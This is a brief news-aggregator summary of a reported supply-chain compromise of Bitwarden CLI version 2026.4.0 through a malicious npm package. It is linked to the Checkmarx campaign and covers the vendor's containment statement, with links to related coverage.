Bitwarden CLI Breach Ties to Checkmarx Supply Chain Campaign

April 23, 2026 at 06:40 PM

•

1 min read

Bitwarden CLI Breach Ties to Checkmarx Supply Chain Campaign — Photo: The Hacker News

TL;DR Summary

Bitwarden CLI version 2026.4.0 was compromised via a malicious bw1.js distributed through npm during the Checkmarx supply chain campaign, with attackers exploiting a compromised GitHub Action in Bitwarden's CI/CD to steal tokens, secrets and credentials and exfiltrate them to audit.checkmarx.cx (and a fallback GitHub repository). The malware can inject malicious workflows to harvest secrets across downstream pipelines; Bitwarden says no end-user vault data was accessed and the issue was contained with the release deprecated. The incident is linked to TeamPCP and related to the Shai-Hulud activity; a CVE will be issued for this release.

Topics:business #bitwarden #ci-cd #cybersecurity #github-actions #npm #supply-chain-attack #technology

Share this article

Bitwarden CLI Compromised in Ongoing Checkmarx Supply Chain Campaign The Hacker News
CanisterSprawl: pgserve Compromised on npm: Malicious Versions Harvest Credentials and Exfiltrate to a Decentralized ICP Canister StepSecurity
New npm supply-chain attack self-spreads to steal auth tokens BleepingComputer
Another npm supply chain worm is tearing through dev environments theregister.com
No Off Season: Three Supply Chain Campaigns Hit npm, PyPI, and Docker Hub in 48 Hours GitGuardian Blog

Reading Insights

Total Reads

Unique Readers

Time Saved

4 min

vs 5 min read

Condensed

90%

911 → 94 words

Want the full story? Read the original article

Read on The Hacker News

JavaScript Required

tl;dr daily news requires JavaScript to be enabled. Please enable JavaScript in your browser settings.

Related Sources

Reading Insights